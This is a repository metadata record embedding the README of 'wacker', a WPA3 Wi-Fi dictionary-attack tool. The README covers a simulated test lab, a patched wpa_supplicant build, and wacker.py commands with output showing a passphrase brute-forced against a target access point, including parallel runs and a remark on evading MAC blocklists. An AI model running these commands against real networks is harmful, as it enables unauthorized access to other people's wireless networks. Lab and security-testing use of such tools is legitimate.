{"id":13839565,"url":"https://github.com/blunderbuss-wctf/wacker","last_synced_at":"2025-07-11T06:30:41.552Z","repository":{"id":45556471,"uuid":"287382293","full_name":"blunderbuss-wctf/wacker","owner":"blunderbuss-wctf","description":"A WPA3 dictionary cracker","archived":false,"fork":false,"pushed_at":"2023-07-10T20:16:49.000Z","size":6437,"stargazers_count":278,"open_issues_count":1,"forks_count":56,"subscribers_count":16,"default_branch":"master","last_synced_at":"2024-08-05T17:23:53.204Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"bsd-2-clause","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/blunderbuss-wctf.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2020-08-13T21:21:28.000Z","updated_at":"2024-07-22T16:36:10.000Z","dependencies_parsed_at":"2024-01-07T09:45:20.748Z","dependency_job_id":null,"html_url":"https://github.com/blunderbuss-wctf/wacker","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/blunderbuss-wctf%2Fwacker","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/blunderbuss-wctf%2Fwacker/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/blunderbuss-wctf%2Fwacker/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/blunderbuss-wctf%2Fwacker/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/blunderbuss-wctf","download_url":"https://codeload.github.com/blunderbuss-wctf/wacker/tar.gz/refs/heads/ma
ster","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225699917,"owners_count":17510431,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:00:30.277Z","updated_at":"2024-11-21T08:31:16.667Z","avatar_url":"https://github.com/blunderbuss-wctf.png","language":"C","funding_links":[],"categories":["C","C (286)","Archs"],"sub_categories":["CTFs tools"],"readme":"# Overview\nA set of scripts to help perform an online dictionary attack against a WPA3 access point. Wacker leverages the wpa_supplicant control interface to control the operations of the supplicant daemon and to get status information and event notifications, ultimately helping speed up connection attempts during brute force attempts.\n\n# Virtual Wifi Arena\nIn lieu of finding a WPA3 AP for testing, consider setting up a local environment using mac80211_hwsim (details below) or by using the VMs provided by the RF Hackers Sanctuary (scoreboard.rfhackers.com).\n\n## Local Simulated Radios\nTo set up your own software simulator of 802.11 radios simply configure and load the correct mac80211_hwsim module.\n```\n# modprobe mac80211_hwsim radios=4\n# iwconfig\nwlan0     IEEE 802.11  ESSID:off/any\n          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm\n          Retry short limit:7   RTS thr:off   Fragment thr:off\n          Power Management:on\n\nwlan1     IEEE 802.11  ESSID:off/any\n          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm\n          Retry short limit:7   RTS thr:off   Fragment thr:off\n          Power 
Management:on\n\nwlan2     IEEE 802.11  ESSID:off/any\n          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm\n          Retry short limit:7   RTS thr:off   Fragment thr:off\n          Power Management:on\n\nwlan3     IEEE 802.11  ESSID:off/any\n          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm\n          Retry short limit:7   RTS thr:off   Fragment thr:off\n          Power Management:on\n```\n\nChoose one of the new interfaces as your WPA3 access point and use the following conf file.\n```\n# cat hostapd.conf\ninterface=wlan0\nssid=WCTF_18\ndriver=nl80211\nhw_mode=g\nchannel=1\nlogger_syslog=-1\nlogger_syslog_level=3\nwpa=2\nwpa_passphrase=Aeromechanics\nwpa_key_mgmt=SAE\nrsn_pairwise=CCMP\nieee80211w=2\ngroup_mgmt_cipher=AES-128-CMAC\n```\nAnd start hostapd with\n```\n# hostapd -K -dd hostapd.conf\n```\n\n\n# Split a wordlist\nIf you have intentions of farming out your cracking efforts across a series of nics the provided split.sh script will partition a wordlist for you.\n```\n# ./split.sh 10 cyberpunk.words \n  50916 cyberpunk.words.aaa\n  50916 cyberpunk.words.aab\n  50916 cyberpunk.words.aac\n  50916 cyberpunk.words.aad\n  50916 cyberpunk.words.aae\n  50916 cyberpunk.words.aaf\n  50916 cyberpunk.words.aag\n  50916 cyberpunk.words.aah\n  50916 cyberpunk.words.aai\n  50907 cyberpunk.words.aaj\n 509151 total\n```\n\n\n# Building wpa_supplicant\nWe're providing our own wpa_supplicant in order to guarantee that certain configurations are set as well as a few mods that need to occur within the source code itself.\n```\n# apt-get install -y pkg-config libnl-3-dev gcc libssl-dev libnl-genl-3-dev\n# cp defconfig wpa_supplicant-2.10/wpa_supplicant/.config\n# git apply wpa_supplicant.patch\n# cd wpa_supplicant-2.10/wpa_supplicant\n# make -j4\n# ls -al wpa_supplicant\n-rwxr-xr-x 1 root root 13541416 May 31 16:30 wpa_supplicant\n```\n\n# Python Requirement\npython3.6+ is required\n\n# Finding a target\nWacker should be seen as a 
complementary tool to airodump or kismet where target selection is already performed. Wacker intentionally disables background scanning with wpa_supplicant to help speed up authentication attempts.\n\n# Running wacker\nThe wacker.py script is intended to perform all the heavy lifting and requires a few specifics regarding the target.\n```\n# ./wacker.py --help\nusage: wacker.py [-h] --wordlist WORDLIST --interface INTERFACE --bssid BSSID\n                 --ssid SSID --freq FREQ [--start START_WORD] [--debug]\n\nA WPA3 dictionary cracker. Must run as root!\n\noptional arguments:\n  -h, --help            show this help message and exit\n  --wordlist WORDLIST   wordlist to use\n  --interface INTERFACE\n                        interface to use\n  --bssid BSSID         bssid of the target\n  --ssid SSID           the ssid of the WPA3 AP\n  --freq FREQ           frequency of the ap\n  --start START_WORD    word to start with in the wordlist\n  --debug               increase logging output\n```\nWith any luck... running the attack using just one instance...\n```\n# ./wacker.py --wordlist cyberpunk.words --ssid WCTF_18 --bssid 02:00:00:00:00:00 --interface wlan2 --freq 2412\nStart time: 21 Aug 2020 07:40:11\nStarting wpa_supplicant...\n    5795 / 509151   words (1.14%) :  79.41 words/sec : 0.020 hours lapsed :   1.76 hours to exhaust (21 Aug 2020 09:25:49)\nFound the password: 'Aeromechanics'\n\nStop time: 21 Aug 2020 07:41:24\n```\n\nRunning multiple instances of wacker is easy if you have the spare nics. Don't forget to partition the wordlist.\n```\n# ./wacker.py --wordlist cyberpunk.words.aaa --ssid WCTF_18 --bssid 02:00:00:00:00:00 --interface wlan1 --freq 2412\n# ./wacker.py --wordlist cyberpunk.words.aab --ssid WCTF_18 --bssid 02:00:00:00:00:00 --interface wlan2 --freq 2412\n# ./wacker.py --wordlist cyberpunk.words.aac --ssid WCTF_18 --bssid 02:00:00:00:00:00 --interface wlan3 --freq 2412\n```\n\n# Files of interest\nwacker is quite verbose. 
Files of interest are found under \u003cb\u003e/tmp/wacker/\u003c/b\u003e\n - wlan1 : one end of the uds\n - wlan1_client : one end of the uds\n - wlan1.conf : initial wpa_supplicant conf needed\n - wlan1.log : supplicant output (only when using --debug option)\n - wlan1.pid : pid file for the wpa_supplicant instance\n - wlan1_wacker.log : wacker debug output\n\n\n# Caution\nwacker doesn't handle ACLs put in place by the target WPA3 AP. Meaning, the current code always uses the same MAC address. If the target AP blacklists our MAC address then the script won't differentiate between a true auth failure and our blacklisted MAC being rejected. This will mean that we'll consider the true password as a failure. One way to solve this would be to add macchanger to the source, at the expense of a slowdown.\n\n\n# Common Problems\n* You'll see this when your client driver doesn't support the correct AKM. Typically this manifests itself in the wpa_supplicant output after you try and run the wacker script. The supplicant will essentially hang waiting for further instructions with the AKM issue detailed below. The needed AKM is 00-0F-AC:8 (SAE) in the case of WPA3.\n\n```\nu631_3: WPA: AP group 0x10 network profile group 0x18; available group 0x10\nu631_3: WPA: using GTK CCMP\nu631_3: WPA: AP pairwise 0x10 network profile pairwise 0x18; available pairwise 0x10\nu631_3: WPA: using PTK CCMP\nu631_3: WPA: AP key_mgmt 0x400 network profile key_mgmt 0x400; available key_mgmt 0x400\nu631_3: WPA: Failed to select authenticated key management type\nu631_3: WPA: Failed to set WPA key management and encryption suites\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fblunderbuss-wctf%2Fwacker","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fblunderbuss-wctf%2Fwacker","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fblunderbuss-wctf%2Fwacker/lists"}